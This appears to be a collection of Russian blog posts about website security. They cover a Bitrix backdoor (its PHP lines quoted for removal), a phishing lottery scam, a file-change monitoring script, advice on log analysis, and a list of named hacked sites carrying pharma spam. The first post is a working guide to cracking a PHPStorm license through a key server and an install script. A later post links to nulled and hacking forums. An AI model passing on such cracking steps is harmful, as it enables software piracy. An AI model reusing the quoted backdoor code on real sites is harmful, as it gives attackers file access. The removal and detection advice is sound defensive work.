Сначала, попробовал воспользоваться триальным месяцем для вновь созданного аккаунта — но почему-то триальные лицензий на таких аккаунтах не находились 🙁
пробовал в режиме инкогнито а так же с Tora, с аккаунтов yandex и gmail — эффект нулевой

Далее решил уже приобрести платный ключ и каждый год продлять (на 3й год сумма существенно снижается) — НО к сожалению из-за санкций к России оплатить заказ никак не получилось — даже после смены страны в настройке акканута оплата картой VISA Российских банков не проходила — PayPal у меня нет, а других вариантов оплаты на сайте не было…

Пришлось гуглить тему взлома 🙁

Идём сюда https://jetbra.in/s
выбираем «живой» сервер, заходим — там качаем архив и кликаем по иконке PHPStorm (ключ активации скопируется в буфер обмена)

Далее я некоторое время помучался, т.к. у меня Ubuntu и по инструкции не «взлетало» (пользователям Windows думаю будет попроще)

Правил вручную phpstorm64.vmoptions — ожидаемого результата не было 🙁 при вводе ключа в PHPStorm получал «key is invalid»

При запуске скрипта scripts/install.sh получал

В итоге помогло решение скопировать содержимое архива прямо в пользовательскую директорию /home/alex/
Далее запуск /home/alex/scripts/install.sh отработал корректно — ввёл скопированный ключ и получил активацию на 1 год.

Чуть подробнее о моих изысканиях:
Читать полностью »

Сегодня решил написать небольшой обзор мошеннической схемы так сказать от первого лица.
Начну с главного — мой подарочный билет в лото выиграл 187 тысяч рублей!!!
Я очень обрадовался и … собственно, решил написать данный обзорчик для рубрики «взлом и безопасность» 🙂
Кто чтению предпочитает просмотр видео — закатал ролик на ту же тему — смотрим.

Схема в принципе стандартная — мошенники хотят получить данные Вашей банковской карты с помощью фишингового сайта (в данном случае — онлайн ЛОТО), но лично я больше слышал о таком … сам не видел. Очень было интересно посмотреть, как это всё работает, вживую 🙂 И вот — мне выпал такой шанс!

Итак, сегодня утром в своём почтовом ящике я обнаружил письмо следующего содержания

Поздравляем! Мы дарим Вам один билет на юбилейный тираж с розыгрышем в 2 миллиарда рублей! Забрать билет Вы можете нажав на кнопку «ПОСМОТРЕТЬ БАЛЛЫ»

Читать полностью »

Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};


5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!

Говорят «лучшее — враг хорошего», и в этом есть смысл.

Под впечатлениями от скрипта в предыдущей статье, решил поставить «следилку» на сайты нескольким своим клиентам, и чуток разочаровался — скрипт у одного не запустился т.к. версия PHP была мягко говоря устаревшей, на мои призывы обновиться сказал «работает — не трогай» (и в этом тоже есть своя правда), у другого довольно сильно подвесил систему т.к. файловая структура составляла сотни! тысяч файлов, а режима «быстрой» проверки (только по атрибутам файла — размер, даты, режим доступа, владельцы) отсутствовал.

Собственно, пришлось сделать простенький скриптик, практически моментально сравнивающий изменения из файлов, содержащих информацию о файловой структуре сайта.
Снимать дампы можно консольно (мне так удобнее), желающие могут дописать скрипт.
Скрипт «голый» — без интерфейса, отправки на мыло изменений и других наворотов — как есть.
Пользоваться так:
ls -alR > file1.txt
ls -alR > file2.txt
fdiff.php file1.txt file2.txt > diff.txt
скрипт кидает результат в поток, в моём случае перенаправленный в diff.txt

Кого заинтересовало — качаем.

В очередной раз коснусь темы безопасности сайтов.
Не буду томить — сразу пару мыслей озвучу, в конце поста подкреплю интересными с моей точки зрения ссылочками.
Итак, мысль первая — чтобы уметь находить шеллы, бэкдоры и прочую хрень, ИМХО обязательно нужно попробовать их попрятать и наоборот — чтобы уметь прятать, нужен опыт по их нахождению!
В идеале — устроить соревнование с единомышленником 🙂
Без инструмента отслеживающего изменения файлов! — т.к. с ним всё очень просто. предположим, что момент инъекции не отслежен, у хакера (товарища) есть доступ к шеллу и снимка файловой системы до инъекции тоже нет. Задача «игры» — как можно дольше удержаться в файловой системе соперника, как можно быстрее удалить инъекции со своего сайта.
Так же при работе с чужим сайтом, помним, что главное — не спалиться. Если каким то образом помимо шелла вычисляем реальный IP атакующего, или какие то данные (имя домена, хостинг оформленные на него, и т.д. и т.п.) — полная победа 🙂 — например чтоб не светить IP можно использовать браузер для анонимного серфинга TOR Browser (в реальности такие данные могут помочь спрятать хакера за решетку).
Вторая мысль уже больше не мысль, а совет для обнаружения уже засевшего бэкдора в момент его работы — обязательно включайте логирование тела POST запроса, ну и логи COOKIE так же не помешают.
В nginx за это отвечают переменные $request_body и $http_cookie, так же у меня не логировался непосредственно хост — добаил $http_host.

Ну и анализ, анализ и ещё раз анализ логов — взять с поличным проще чем отловить иньъекцию в файловой системе (это вы поймёте ознакомившись с прикреплённым материалом — способов зашифровать инъекцию великое множество — и далеко не все ищутся антивирусами и спец.софтом) — именно поэтому много бэкдоров после успешной инъекции могут выжидать своего часа дни, недели, месяца.

Ну и как обещал, кучка интересных ссылок (там на каждом ресурсе можно ещё пошарить — инфы полезной масса).
Для начала, стоит почитать статьи от авторов известного скрипта для поиска заразы ai-bolit.php
Далее уже пошли ссылки потяжелее 🙂

https://www.nulled.cc/threads/252175/

https://forum.antichat.ru/threads/298338/

https://habrahabr.ru/post/280516/

Время от времени, а точнее когда в очередной раз натыкаюсь на ломаные сайты, публикую подобные посты а ля «вылечу Ваш сайт», проведу аудит безопасности и самое главное — установлю систему контроля на взлом Вашего сайта!
Вот и сейчас пример поломанных 4х сайтов с файловыми и php иньекциями, тематика фармацевтика — т.к. её часто смотрю:
Сайт www.mgrad-putilkovo.ru — инъекция Где можно купить дженерик сиалис
Сайт www.catalog-max.ru — инъекция Где можно купить таблетки виагра
Сайт pearl-zelenograd.ru — инъекция Не дорого преобрести левитра — взломщик видимо не особо грамотный попался 🙂
Сайт za-vidnoe.ru — инъекция Женская виагра купить в аптеке Москва

Как видно хакеры уже ломают с умом и с конкретной целью — монетизировать взломанный ресурс, путём продажи через партнерку фарма препаратов (если конечно дорвей долго проживёт и поймает поисковый трафик — проиндексируется и «повисит» в выдаче Яндекса некоторое время на хороших позициях).
Так же видим, что по сути прямого вреда сайту данная иньекция не наносит — информация на сайте остаётся нетронутой, но всё же я думаю вред всё таки есть — страницы генерируются доргеном, текст на таких страничках создаётся роботизированный — не имеющий смысла, подобные страницы как правило не нравятся поисковикам — и на сайт накладываются штрафные санкции понижающие его в поисковой выдаче — что может быть хуже ? (конечно кроме порчи информации)
Так что, если Ваш сайт резко начал снижаться в позициях в ТОПах — проверьте его на зараженность, если сами не умеете — обратитесь к профессионалам или например я мог бы глянуть (гораздо дешевле чем у профи).

P.S.
К сожалению на мои посты и письма никто внимание не обращает — видимо люди заводят сайты просто так, и им плевать что с ними дальше будет.